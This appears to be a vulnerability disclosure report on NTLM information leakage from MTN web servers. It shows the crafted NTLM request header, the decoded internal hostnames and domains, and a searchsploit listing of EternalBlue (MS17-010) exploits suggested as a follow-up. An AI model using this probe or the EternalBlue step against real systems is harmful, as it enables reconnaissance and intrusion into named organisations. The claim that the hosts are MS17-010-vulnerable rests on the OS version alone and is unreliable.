Disclosure of internal information using hidden NTLM authentication leading to an exploit server

By using a request get on the url [http://www.mtncongo.net/fr/Pages/](http://www.mtncongo.net/fr/Pages/) of the blog. we collect sensitive information from blogs ## step Typically, when visiting a website http://www.mtncongo.net/ or directory http://www.mtncongo.net/fr/Pages/ requiring privileged access, the server will initiate a login prompt. This allows the client to send blank username and password values to check for NTLM authentication and receive the encoded response. However, if the target server is configured to allow windowsAuthentication, it may be possible to invoke this response without a login prompt. This can be done by adding “Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=” to the request headers. Once an NTLM challenge is returned in the “WWW-Authenticate” value of the response headers, it can be decoded to capture internal information. I personally use Burp’s NTLM Challenge Decoder, but multiple other scripts have been written that can perform these actions. ``` GET /fr/Pages/ HTTP/1.1 Host: www.mtncongo.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: _ga=GA1.2.1970872956.1586929016; TS018d6ddd=01c53200304ba8c07c5d1e1605e0dc70471aa0d1c81ddc94c3b123534979fa4847a53cfa75467281d64fa48324e4a64f699cc4c2df Upgrade-Insecure-Requests: 1 Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= ``` ``` Target MTNICT MsvAvNbComputerName ZACNVSPRWSBS01 MsvAvDnsDomainName mtnict.local Windows Server 2012 R2 / Windows 8.1 version MsvAvNbDomainName MTNICT MsvAvDnsComputerName ZACNVSPRWSBS01.mtnict.local MsvAvDnsTreeName mtnict.local MsvAvTimestamp 2020-04-17 03:58:41 ``` This same vulnerability is present on the blog www.mtnbusiness.co.za ``` Target MTNGROUPSA MsvAvNbComputerName PSWSPEMVA21 MsvAvDnsDomainName mtn.co.za Version Windows Server 2012 R2 / Windows 8.1 MsvAvNbDomainName MTNGROUPSA MsvAvDnsComputerName PSWSPEMVA21.mtn.co.za MsvAvDnsTreeName mtn.co.za MsvAvTimestamp 2020-04-18 05:30:12 ``` Obviously we have a Target name, computer name, and the essential version: version of Windows Server 2012 R2 / Windows 8.1 vulnerable to a remote attack, MS17-010: CVE: 2017-0144 Let run metasploite with the exploit Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Exploiting this vulnerability would be going against the rules of politics I would like to point out that this vulnerability is clearly dangerous and its exploitation would just be a game for an intentional bad attacker. ``` -------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | exploits/windows/remote/43970.rb Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py -------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- ``` ## Impact >-Malicious attackers can add bitcoin mining source code to the site architecture >-Modified changes to the database >-Collect person information on blog staff